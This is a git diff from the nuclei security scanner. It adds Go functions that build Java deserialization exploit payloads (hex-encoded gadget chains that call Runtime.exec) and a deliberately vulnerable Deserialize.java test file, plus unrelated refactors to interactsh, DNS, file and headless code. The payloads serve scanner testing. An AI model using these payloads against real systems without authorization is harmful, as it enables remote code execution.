696D653B0C002C002D0A002B002E0100") + buffer.Write(middle) + buffer.WriteString(url) + suffix, _ := hex.DecodeString("08003001000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003200330A002B003401002179736F73657269616C2F4A6578426F7373323631343139333134303837383735390100234C79736F73657269616C2F4A6578426F7373323631343139333134303837383735393B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000002E000E0000000C000100000005000F003700000001001300140002000C0000003F0000000300000001B100000002000D00000006000100000033000E00000020000300000001000F0037000000000001001500160001000000010017001800020019000000040001001A00010013001B0002000C000000490000000400000001B100000002000D00000006000100000037000E0000002A000400000001000F003700000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A00080029000B0001000C0000001B000300020000000FA70003014CB8002F1231B6003557B1000000000002002000000002002100110000000A000100020023001000097571007E000C000001D4CAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100254C79736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A01002379736F73657269616C2F7061796C6F6164732F7574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501001F79736F73657269616C2F7061796C6F6164732F7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000003B000E0000000C000100000005000F001200000002001300000002001400110000000A00010002001600100009707400076A6578626F73737077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200014C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B78707372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50200024C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B4C0004747970657400114C6A6176612F6C616E672F436C6173733B7870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001740008663561356136303871007E0009787672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C617465730000000000000000000000787078") + buffer.Write(suffix) + + return buffer.Bytes() +} + +// generatejdk8u20Payload generates deserialization payload for jdk8. 
+// improved from Alvaro (pwntester) version +func generatejdk8u20Payload(url string) []byte { + buffer := &bytes.Buffer{} + + prefix, _ := hex.DecodeString("ACED0005737200176A6176612E7574696C2E4C696E6B656448617368536574D86CD75A95DD2A1E020000787200116A6176612E7574696C2E48617368536574BA44859596B8B7340300007870770C000000103F400000000000027372003A636F6D2E73756E2E6F72672E6170616368652E78616C616E2E696E7465726E616C2E78736C74632E747261782E54656D706C61746573496D706C09574FC16EACAB3303000949000D5F696E64656E744E756D62657249000E5F7472616E736C6574496E6465785A00155F75736553657276696365734D656368616E69736D4C00195F61636365737345787465726E616C5374796C6573686565747400124C6A6176612F6C616E672F537472696E673B4C000B5F617578436C617373657374003B4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F486173687461626C653B5B000A5F62797465636F6465737400035B5B425B00065F636C6173737400125B4C6A6176612F6C616E672F436C6173733B4C00055F6E616D6571007E00054C00115F6F757470757450726F706572746965737400164C6A6176612F7574696C2F50726F706572746965733B787000000000FFFFFFFF00740003616C6C70757200035B5B424BFD19156767DB37020000787000000002757200025B42ACF317F8060854E00200007870000006") + buffer.Write(prefix) + buffer.WriteString(string(rune(len(url) + 147))) + middle, _ := hex.DecodeString("CAFEBABE00000031003A0A0003002407003807002707002801001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C756505AD2093F391DDEF3E0100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010013537475625472616E736C65745061796C6F616401000C496E6E6572436C61737365730100224C7574696C2F4761646765747324537475625472616E736C65745061796C6F61643B0100097472616E73666F726D010072284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B5B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B2956010008646F63756D656E7401002D4C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B01000868616E646C6572730100425B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B01000A457863657074696F6E730700290100A6284C636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F444F4D3B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B4C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B29560100086974657261746F720100354C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F64746D2F44544D417869734974657261746F723B01000768616E646C65720100414C636F6D2F73756E2F6F72672F6170616368652F786D6C2F696E7465726E616C2F73657269616C697A65722F53657269616C697A6174696F6E48616E646C65723B0100236F72672E6E65746265616E732E536F757263654C6576656C416E6E6F746174696F6E730100144C6A6176612F6C616E672F4F766572726964653B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07002A0100207574696C2F4761646765747324537475625472616E736C65745061796C6F6164010040636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F72756E74696D652F41627374726163745472616E736C65740100146A6176612F696F2F53657269616C697A61626C65010039636F6D2F73756E2F6F72672F6170616368652F78616C616E2F696E7465726E616C2F78736C74632F5472616E736C6574457863657074696F6E01000C7574696C2F476164676574730100083C636C696E69743E0100116A6176612
F6C616E672F52756E74696D6507002C01000A67657452756E74696D6501001528294C6A6176612F6C616E672F52756E74696D653B0C002E002F0A002D00300100") + buffer.Write(middle) + buffer.WriteString(url) + suffix, _ := hex.DecodeString("08003201000465786563010027284C6A6176612F6C616E672F537472696E673B294C6A6176612F6C616E672F50726F636573733B0C003400350A002D003601002179736F73657269616C2F4A6578426F7373323434393535333834303536333337380100234C79736F73657269616C2F4A6578426F7373323434393535333834303536333337383B002100020003000100040001001A000500060001000700000002000800040001000A000B0001000C0000002F00010001000000052AB70001B100000002000D0000000600010000001C000E0000000C000100000005000F003900000001001300140002000C0000003F0000000300000001B100000002000D0000000600010000001F000E00000020000300000001000F0039000000000001001500160001000000010017001800020019000000040001001A00010013001B0003000C000000490000000400000001B100000002000D00000006000100000022000E0000002A000400000001000F003900000000000100150016000100000001001C001D000200000001001E001F00030019000000040001001A0020000000060001002100000008002B000B0001000C0000001B000300020000000FA70003014CB800311233B6003757B1000000000002002200000002002300110000000A000100020025001000097571007E000D0000019BCAFEBABE00000031001B0A0003001507001707001807001901001073657269616C56657273696F6E5549440100014A01000D436F6E7374616E7456616C75650571E669EE3C6D47180100063C696E69743E010003282956010004436F646501000F4C696E654E756D6265725461626C650100124C6F63616C5661726961626C655461626C6501000474686973010003466F6F01000C496E6E6572436C61737365730100124C7574696C2F4761646765747324466F6F3B01000A536F7572636546696C6501000C476164676574732E6A6176610C000A000B07001A0100107574696C2F4761646765747324466F6F0100106A6176612F6C616E672F4F626A6563740100146A6176612F696F2F53657269616C697A61626C6501000C7574696C2F47616467657473002100020003000100040001001A000500060001000700000002000800010001000A000B0001000C0000002F00010001000000052AB70001B100000002000D00000006000100000026000E0000000C000100000005000F001200000002001300000002001400110000000A00010002001600100009707400076A6578626F73737077010078737D00000001001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C61746573787200176A6176612E6C616E672E7265666C6563742E50726F7879E127DA20CC1043CB0200024C000564756D6D797400124C6A6176612F6C616E672F4F626A6563743B4C0001687400254C6A6176612F6C616E672F7265666C6563742F496E766F636174696F6E48616E646C65723B7870737200296A6176612E6265616E732E6265616E636F6E746578742E4265616E436F6E74657874537570706F7274BC4820F0918FB90C03000149000C73657269616C697A61626C657872002E6A6176612E6265616E732E6265616E636F6E746578742E4265616E436F6E746578744368696C64537570706F727457D4EFC704DC72250200014C00146265616E436F6E746578744368696C64506565727400294C6A6176612F6265616E732F6265616E636F6E746578742F4265616E436F6E746578744368696C643B787071007E0019000000017372003273756E2E7265666C6563742E616E6E6F746174696F6E2E416E6E6F746174696F6E496E766F636174696F6E48616E646C657255CAF50F15CB7EA50300024C0004747970657400114C6A6176612F6C616E672F436C6173733B4C000C6D656D62657256616C75657374000F4C6A6176612F7574696C2F4D61703B78707672001D6A617661782E786D6C2E7472616E73666F726D2E54656D706C6174657300000000000000000000007870737200116A6176612E7574696C2E486173684D61700507DAC1C31660D103000246000A6C6F6164466163746F724900097468726573686F6C6478703F4000000000000C77080000001000000001740008663561356136303871007E0009787704000000007871007E001D78") + buffer.Write(suffix) + + return buffer.Bytes() +} diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java 
b/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java new file mode 100644 index 0000000000..b63528ddf0 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/Deserialize.java @@ -0,0 +1,30 @@ +import java.io.*; + +class Deserialize { + public static void main(String args[]) { + FileInputStream fileIn = null; + ObjectInputStream in = null; + ValueObject vo2 = null; + + try { + fileIn = new FileInputStream("ValueObject2.ser"); + } + catch(FileNotFoundException e) { + e.printStackTrace(); + } + + try { + in = new ObjectInputStream(fileIn); + } + catch(IOException e) { + e.printStackTrace(); + } + try { + vo2 = (ValueObject) in.readObject(); + } + catch(Exception e) { + e.printStackTrace(); + } + System.out.println(vo2); + } +} \ No newline at end of file diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md b/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md new file mode 100644 index 0000000000..666ee024a6 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/README.md @@ -0,0 +1,11 @@ +# testdata + +### Test Unsafe Java Deserialization + +``` +javac Deserialize.java ValueObject.java +# generate payload and write to ValueObject2.ser +java Deserialize +``` + +Modified From: https://snyk.io/blog/serialization-and-deserialization-in-java/ \ No newline at end of file diff --git a/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java b/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java new file mode 100644 index 0000000000..cbf3011ca4 --- /dev/null +++ b/v2/pkg/protocols/common/helpers/deserialization/testdata/ValueObject.java @@ -0,0 +1,15 @@ +import java.io.*; + +public class ValueObject implements Serializable { + private String value; + private String sideEffect; + + public ValueObject() { + this("empty"); + } + + public ValueObject(String value) { + this.value = value; + this.sideEffect = java.time.LocalTime.now().toString(); + } +} diff --git a/v2/pkg/protocols/common/interactsh/interactsh.go b/v2/pkg/protocols/common/interactsh/interactsh.go index b6730b1e73..6fa71797be 100644 --- a/v2/pkg/protocols/common/interactsh/interactsh.go +++ b/v2/pkg/protocols/common/interactsh/interactsh.go @@ -3,6 +3,7 @@ package interactsh import ( "net/url" "strings" + "sync/atomic" "time" "github.com/karlseguin/ccache" @@ -14,24 +15,31 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/output" "github.com/projectdiscovery/nuclei/v2/pkg/progress" "github.com/projectdiscovery/nuclei/v2/pkg/reporting" - "github.com/valyala/fasttemplate" ) // Client is a wrapped client for interactsh server. type Client struct { + dotHostname string // interactsh is a client for interactsh server. interactsh *client.Client // requests is a stored cache for interactsh-url->request-event data. requests *ccache.Cache + // interactions is a stored cache for interactsh-interaction->interactsh-url data + interactions *ccache.Cache - matched bool - dotHostname string + options *Options eviction time.Duration pollDuration time.Duration cooldownDuration time.Duration + + generated uint32 // decide to wait if we have a generated url + matched bool } -var interactshURLMarker = "{{interactsh-url}}" +var ( + defaultInteractionDuration = 60 * time.Second + interactshURLMarker = "{{interactsh-url}}" +) // Options contains configuration options for interactsh nuclei integration. 
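// The fields consumed by New and its polling callback below include ServerURL, CacheSize,
// Eviction, PollDuration, ColldownPeriod, Output, Progress and IssuesClient.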
type Options struct { @@ -56,6 +64,8 @@ type Options struct { Progress progress.Progress } +const defaultMaxInteractionsCount = 5000 + // New returns a new interactsh server client func New(options *Options) (*Client, error) { parsed, err := url.Parse(options.ServerURL) @@ -74,10 +84,16 @@ func New(options *Options) (*Client, error) { configure = configure.MaxSize(options.CacheSize) cache := ccache.New(configure) + interactionsCfg := ccache.Configure() + interactionsCfg = interactionsCfg.MaxSize(defaultMaxInteractionsCount) + interactionsCache := ccache.New(interactionsCfg) + interactClient := &Client{ interactsh: interactsh, eviction: options.Eviction, + interactions: interactionsCache, dotHostname: "." + parsed.Host, + options: options, requests: cache, pollDuration: options.PollDuration, cooldownDuration: options.ColldownPeriod, @@ -86,54 +102,70 @@ func New(options *Options) (*Client, error) { interactClient.interactsh.StartPolling(interactClient.pollDuration, func(interaction *server.Interaction) { item := interactClient.requests.Get(interaction.UniqueID) if item == nil { + // If we don't have any request for this ID, add it to temporary + // lru cache so we can correlate when we get an add request. + gotItem := interactClient.interactions.Get(interaction.UniqueID) + if gotItem == nil { + interactClient.interactions.Set(interaction.UniqueID, []*server.Interaction{interaction}, defaultInteractionDuration) + } else if items, ok := gotItem.Value().([]*server.Interaction); ok { + items = append(items, interaction) + interactClient.interactions.Set(interaction.UniqueID, items, defaultInteractionDuration) + } return } - data, ok := item.Value().(*RequestData) + request, ok := item.Value().(*RequestData) if !ok { return } + _ = interactClient.processInteractionForRequest(interaction, request) + }) + return interactClient, nil +} - data.Event.InternalEvent["interactsh_protocol"] = interaction.Protocol - data.Event.InternalEvent["interactsh_request"] = interaction.RawRequest - data.Event.InternalEvent["interactsh_response"] = interaction.RawResponse - result, matched := data.Operators.Execute(data.Event.InternalEvent, data.MatchFunc, data.ExtractFunc) - if !matched || result == nil { - return // if we don't match, return - } - interactClient.requests.Delete(interaction.UniqueID) +// processInteractionForRequest processes an interaction for a request +func (c *Client) processInteractionForRequest(interaction *server.Interaction, data *RequestData) bool { + data.Event.InternalEvent["interactsh_protocol"] = interaction.Protocol + data.Event.InternalEvent["interactsh_request"] = interaction.RawRequest + data.Event.InternalEvent["interactsh_response"] = interaction.RawResponse + result, matched := data.Operators.Execute(data.Event.InternalEvent, data.MatchFunc, data.ExtractFunc) + if !matched || result == nil { + return false // if we don't match, return + } + c.requests.Delete(interaction.UniqueID) - if data.Event.OperatorsResult != nil { - data.Event.OperatorsResult.Merge(result) - } else { - data.Event.OperatorsResult = result + if data.Event.OperatorsResult != nil { + data.Event.OperatorsResult.Merge(result) + } else { + data.Event.OperatorsResult = result + } + data.Event.Results = data.MakeResultFunc(data.Event) + + for _, result := range data.Event.Results { + result.Interaction = interaction + _ = c.options.Output.Write(result) + if !c.matched { + c.matched = true } - data.Event.Results = data.MakeResultFunc(data.Event) - for _, result := range data.Event.Results { - result.Interaction = 
interaction - _ = options.Output.Write(result) - if !interactClient.matched { - interactClient.matched = true - } - options.Progress.IncrementMatched() + c.options.Progress.IncrementMatched() - if options.IssuesClient != nil { - if err := options.IssuesClient.CreateIssue(result); err != nil { - gologger.Warning().Msgf("Could not create issue on tracker: %s", err) - } + if c.options.IssuesClient != nil { + if err := c.options.IssuesClient.CreateIssue(result); err != nil { + gologger.Warning().Msgf("Could not create issue on tracker: %s", err) } } - }) - return interactClient, nil + } + return true } // URL returns a new URL that can be interacted with func (c *Client) URL() string { + atomic.CompareAndSwapUint32(&c.generated, 0, 1) return c.interactsh.URL() } // Close closes the interactsh clients after waiting for cooldown period. func (c *Client) Close() bool { - if c.cooldownDuration > 0 { + if c.cooldownDuration > 0 && atomic.LoadUint32(&c.generated) == 1 { time.Sleep(c.cooldownDuration) } c.interactsh.StopPolling() @@ -150,9 +182,7 @@ func (c *Client) ReplaceMarkers(data, interactshURL string) string { if !strings.Contains(data, interactshURLMarker) { return data } - replaced := fasttemplate.ExecuteStringStd(data, "{{", "}}", map[string]interface{}{ - "interactsh-url": interactshURL, - }) + replaced := strings.NewReplacer("{{interactsh-url}}", interactshURL).Replace(data) return replaced } @@ -171,7 +201,28 @@ type RequestData struct { // RequestEvent is the event for a network request sent by nuclei. func (c *Client) RequestEvent(interactshURL string, data *RequestData) { id := strings.TrimSuffix(interactshURL, c.dotHostname) - c.requests.Set(id, data, c.eviction) + + interaction := c.interactions.Get(id) + if interaction != nil { + // If we have previous interactions, get them and process them. 
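// Each buffered interaction is replayed through processInteractionForRequest below; once
// one of them matches, the buffered entries for this interactsh ID are removed.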
+ interactions, ok := interaction.Value().([]*server.Interaction) + if !ok { + c.requests.Set(id, data, c.eviction) + return + } + matched := false + for _, interaction := range interactions { + if c.processInteractionForRequest(interaction, data) { + matched = true + break + } + } + if matched { + c.interactions.Delete(id) + } + } else { + c.requests.Set(id, data, c.eviction) + } } // HasMatchers returns true if an operator has interactsh part diff --git a/v2/pkg/protocols/common/protocolinit/init.go b/v2/pkg/protocols/common/protocolinit/init.go index b31958c9cd..1877a1ab3b 100644 --- a/v2/pkg/protocols/common/protocolinit/init.go +++ b/v2/pkg/protocols/common/protocolinit/init.go @@ -22,10 +22,7 @@ func Init(options *types.Options) error { if err := httpclientpool.Init(options); err != nil { return err } - if err := networkclientpool.Init(options); err != nil { - return err - } - return nil + return networkclientpool.Init(options) } var userAgents = []string{ diff --git a/v2/pkg/protocols/common/protocolstate/state.go b/v2/pkg/protocols/common/protocolstate/state.go index deb6b3e3fe..0f80f66477 100644 --- a/v2/pkg/protocols/common/protocolstate/state.go +++ b/v2/pkg/protocols/common/protocolstate/state.go @@ -6,8 +6,10 @@ import ( "github.com/projectdiscovery/nuclei/v2/pkg/types" ) +// Dialer is a shared fastdialer instance for host DNS resolution var Dialer *fastdialer.Dialer +// Init creates the Dialer instance based on user configuration func Init(options *types.Options) error { opts := fastdialer.DefaultOptions if options.SystemResolvers { @@ -24,6 +26,7 @@ func Init(options *types.Options) error { return nil } +// Close closes the global shared fastdialer func Close() { if Dialer != nil { Dialer.Close() diff --git a/v2/pkg/protocols/dns/dns.go b/v2/pkg/protocols/dns/dns.go index 5fdf49cc59..0538186f94 100644 --- a/v2/pkg/protocols/dns/dns.go +++ b/v2/pkg/protocols/dns/dns.go @@ -118,6 +118,8 @@ func questionTypeToInt(questionType string) uint16 { question = dns.TypeMX case "TXT": question = dns.TypeTXT + case "DS": + question = dns.TypeDS case "AAAA": question = dns.TypeAAAA } diff --git a/v2/pkg/protocols/dns/operators.go b/v2/pkg/protocols/dns/operators.go index 860a38f858..5d18c4d52c 100644 --- a/v2/pkg/protocols/dns/operators.go +++ b/v2/pkg/protocols/dns/operators.go @@ -103,6 +103,7 @@ func (r *Request) responseToDSLMap(req, resp *dns.Msg, host, matched string) out data["raw"] = rawData data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -137,6 +138,7 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "dns", Host: types.ToString(wrapped.InternalEvent["host"]), diff --git a/v2/pkg/protocols/dns/operators_test.go b/v2/pkg/protocols/dns/operators_test.go index c8de0ddeaf..275bf1bbdd 100644 --- a/v2/pkg/protocols/dns/operators_test.go +++ b/v2/pkg/protocols/dns/operators_test.go @@ -42,7 +42,7 @@ func TestResponseToDSLMap(t *testing.T) { resp.Answer = append(resp.Answer, &dns.A{A: net.ParseIP("1.1.1.1"), Hdr: dns.RR_Header{Name: "one.one.one.one."}}) event := request.responseToDSLMap(req, resp, 
"one.one.one.one", "one.one.one.one") - require.Len(t, event, 11, "could not get correct number of items in dsl map") + require.Len(t, event, 12, "could not get correct number of items in dsl map") require.Equal(t, dns.RcodeSuccess, event["rcode"], "could not get correct rcode") } diff --git a/v2/pkg/protocols/file/file.go b/v2/pkg/protocols/file/file.go index df362531ca..d5b8101849 100644 --- a/v2/pkg/protocols/file/file.go +++ b/v2/pkg/protocols/file/file.go @@ -37,7 +37,7 @@ type Request struct { } // defaultDenylist is the default list of extensions to be denied -var defaultDenylist = []string{".3g2", ".3gp", ".7z", ".apk", ".arj", ".avi", ".axd", ".bmp", ".css", ".csv", ".deb", ".dll", ".doc", ".drv", ".eot", ".exe", ".flv", ".gif", ".gifv", ".gz", ".h264", ".ico", ".iso", ".jar", ".jpeg", ".jpg", ".lock", ".m4a", ".m4v", ".map", ".mkv", ".mov", ".mp3", ".mp4", ".mpeg", ".mpg", ".msi", ".ogg", ".ogm", ".ogv", ".otf", ".pdf", ".pkg", ".png", ".ppt", ".psd", ".rar", ".rm", ".rpm", ".svg", ".swf", ".sys", ".tar.gz", ".tar", ".tif", ".tiff", ".ttf", ".txt", ".vob", ".wav", ".webm", ".wmv", ".woff", ".woff2", ".xcf", ".xls", ".xlsx", ".zip"} +var defaultDenylist = []string{".3g2", ".3gp", ".7z", ".apk", ".arj", ".avi", ".axd", ".bmp", ".css", ".csv", ".deb", ".dll", ".doc", ".drv", ".eot", ".exe", ".flv", ".gif", ".gifv", ".gz", ".h264", ".ico", ".iso", ".jar", ".jpeg", ".jpg", ".lock", ".m4a", ".m4v", ".map", ".mkv", ".mov", ".mp3", ".mp4", ".mpeg", ".mpg", ".msi", ".ogg", ".ogm", ".ogv", ".otf", ".pdf", ".pkg", ".png", ".ppt", ".psd", ".rar", ".rm", ".rpm", ".svg", ".swf", ".sys", ".tar.gz", ".tar", ".tif", ".tiff", ".ttf", ".vob", ".wav", ".webm", ".wmv", ".woff", ".woff2", ".xcf", ".xls", ".xlsx", ".zip"} // GetID returns the unique ID of the request if any. func (r *Request) GetID() string { diff --git a/v2/pkg/protocols/file/operators.go b/v2/pkg/protocols/file/operators.go index 7b3b59fee6..f2a57a3d29 100644 --- a/v2/pkg/protocols/file/operators.go +++ b/v2/pkg/protocols/file/operators.go @@ -1,6 +1,8 @@ package file import ( + "bufio" + "strings" "time" "github.com/projectdiscovery/nuclei/v2/pkg/operators/extractors" @@ -71,6 +73,7 @@ func (r *Request) responseToDSLMap(raw, host, matched string) output.InternalEve data["raw"] = raw data["template-id"] = r.options.TemplateID data["template-info"] = r.options.TemplateInfo + data["template-path"] = r.options.TemplatePath return data } @@ -99,16 +102,45 @@ func (r *Request) MakeResultEvent(wrapped *output.InternalWrappedEvent) []*outpu data := r.makeResultEventItem(wrapped) results = append(results, data) } + raw, ok := wrapped.InternalEvent["raw"] + if !ok { + return results + } + rawStr, ok := raw.(string) + if !ok { + return results + } + + // Identify the position of match in file using a dirty hack. 
+ for _, result := range results { + for _, extraction := range result.ExtractedResults { + scanner := bufio.NewScanner(strings.NewReader(rawStr)) + + line := 1 + for scanner.Scan() { + if strings.Contains(scanner.Text(), extraction) { + if result.FileToIndexPosition == nil { + result.FileToIndexPosition = make(map[string]int) + } + result.FileToIndexPosition[result.Matched] = line + continue + } + line++ + } + } + } return results } func (r *Request) makeResultEventItem(wrapped *output.InternalWrappedEvent) *output.ResultEvent { data := &output.ResultEvent{ TemplateID: types.ToString(wrapped.InternalEvent["template-id"]), + TemplatePath: types.ToString(wrapped.InternalEvent["template-path"]), Info: wrapped.InternalEvent["template-info"].(map[string]interface{}), Type: "file", Path: types.ToString(wrapped.InternalEvent["path"]), Matched: types.ToString(wrapped.InternalEvent["matched"]), + Host: types.ToString(wrapped.InternalEvent["matched"]), ExtractedResults: wrapped.OperatorsResult.OutputExtracts, Timestamp: time.Now(), } diff --git a/v2/pkg/protocols/file/operators_test.go b/v2/pkg/protocols/file/operators_test.go index b6aa59d84e..f6da253ca7 100644 --- a/v2/pkg/protocols/file/operators_test.go +++ b/v2/pkg/protocols/file/operators_test.go @@ -32,7 +32,7 @@ func TestResponseToDSLMap(t *testing.T) { resp := "test-data\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") } @@ -57,7 +57,7 @@ func TestFileOperatorMatch(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") t.Run("valid", func(t *testing.T) { @@ -122,7 +122,7 @@ func TestFileOperatorExtract(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") t.Run("extract", func(t *testing.T) { @@ -187,7 +187,7 @@ func TestFileMakeResult(t *testing.T) { resp := "test-data\r\n1.1.1.1\r\n" event := request.responseToDSLMap(resp, "one.one.one.one", "one.one.one.one") - require.Len(t, event, 5, "could not get correct number of items in dsl map") + require.Len(t, event, 6, "could not get correct number of items in dsl map") require.Equal(t, resp, event["raw"], "could not get correct resp") finalEvent := &output.InternalWrappedEvent{InternalEvent: event} diff --git a/v2/pkg/protocols/headless/engine/engine.go b/v2/pkg/protocols/headless/engine/engine.go index 6c8d613e97..ba5b4cef34 100644 --- a/v2/pkg/protocols/headless/engine/engine.go +++ b/v2/pkg/protocols/headless/engine/engine.go @@ -10,16 +10,17 @@ import ( "github.com/corpix/uarand" "github.com/go-rod/rod" "github.com/go-rod/rod/lib/launcher" - ps "github.com/mitchellh/go-ps" "github.com/pkg/errors" "github.com/projectdiscovery/nuclei/v2/pkg/types" + "github.com/projectdiscovery/stringsutil" + ps "github.com/shirou/gopsutil/v3/process" ) // Browser 
is a browser structure for nuclei headless module type Browser struct { customAgent string tempDir string - previouspids map[int]struct{} // track already running pids + previouspids map[int32]struct{} // track already running pids engine *rod.Browser httpclient *http.Client options *types.Options @@ -31,6 +32,7 @@ func New(options *types.Options) (*Browser, error) { if err != nil { return nil, errors.Wrap(err, "could not create temporary directory") } + previouspids := findChromeProcesses() chromeLauncher := launcher.New(). Leakless(false). Set("disable-gpu", "true"). @@ -84,7 +86,7 @@ func New(options *types.Options) (*Browser, error) { httpclient: httpclient, options: options, } - engine.previouspids = engine.findChromeProcesses() + engine.previouspids = previouspids return engine, nil } @@ -98,24 +100,39 @@ func (b *Browser) Close() { // killChromeProcesses any and all new chrome processes started after // headless process launch. func (b *Browser) killChromeProcesses() { - newProcesses := b.findChromeProcesses() - for id := range newProcesses { - if _, ok := b.previouspids[id]; ok { + processes, _ := ps.Processes() + + for _, process := range processes { + // skip non chrome processes + if !isChromeProcess(process) { continue } - kill(id) + // skip chrome processes that were already running + if _, ok := b.previouspids[process.Pid]; ok { + continue + } + _ = process.Kill() } } // findChromeProcesses finds chrome process running on host -func (b *Browser) findChromeProcesses() map[int]struct{} { +func findChromeProcesses() map[int32]struct{} { processes, _ := ps.Processes() - list := make(map[int]struct{}) + list := make(map[int32]struct{}) for _, process := range processes { - if strings.Contains(process.Executable(), "chrome") || strings.Contains(process.Executable(), "chromium") { - list[process.PPid()] = struct{}{} - list[process.Pid()] = struct{}{} + if isChromeProcess(process) { + list[process.Pid] = struct{}{} + if ppid, err := process.Ppid(); err == nil { + list[ppid] = struct{}{} + } } } return list } + +// isChromeProcess checks if a process is chrome/chromium +func isChromeProcess(process *ps.Process) bool { + name, _ := process.Name() + executable, _ := process.Exe() + return stringsutil.ContainsAny(name, "chrome", "chromium") || stringsutil.ContainsAny(executable, "chrome", "chromium") +} diff --git a/v2/pkg/protocols/headless/engine/engine_unix.go b/v2/pkg/protocols/headless/engine/engine_unix.go deleted file mode 100644 index 73a3e55fad..0000000000 --- a/v2/pkg/protocols/headless/engine/engine_unix.go +++ /dev/null @@ -1,11 +0,0 @@ -// +build !windows - -package engine - -import ( - "syscall" -) - -func kill(pid int) { - _ = syscall.Kill(-pid, syscall.SIGKILL) -} diff --git a/v2/pkg/protocols/headless/engine/engine_windows.go b/v2/pkg/protocols/headless/engine/engine_windows.go deleted file mode 100644 index feb97ff624..0000000000 --- a/v2/pkg/protocols/headless/engine/engine_windows.go +++ /dev/null @@ -1,12 +0,0 @@ -// +build windows - -package engine - -import ( - "os/exec" - "strconv" -) - -func kill(pid int) { - _ = exec.Command("taskkill", "/t", "/f", "/pid", strconv.Itoa(pid)).Run() -} diff --git a/v2/pkg/protocols/headless/engine/page.go b/v2/pkg/protocols/headless/engine/page.go index 185eb33c7e..16eae572f7 100644 --- a/v2/pkg/protocols/headless/engine/page.go +++ b/v2/pkg/protocols/headless/engine/page.go @@ -49,7 +49,6 @@ func (i *Instance) Run(baseURL *url.URL, actions []*Action, timeout time.Duratio if err != nil { return nil, nil, err } - go router.Run() 
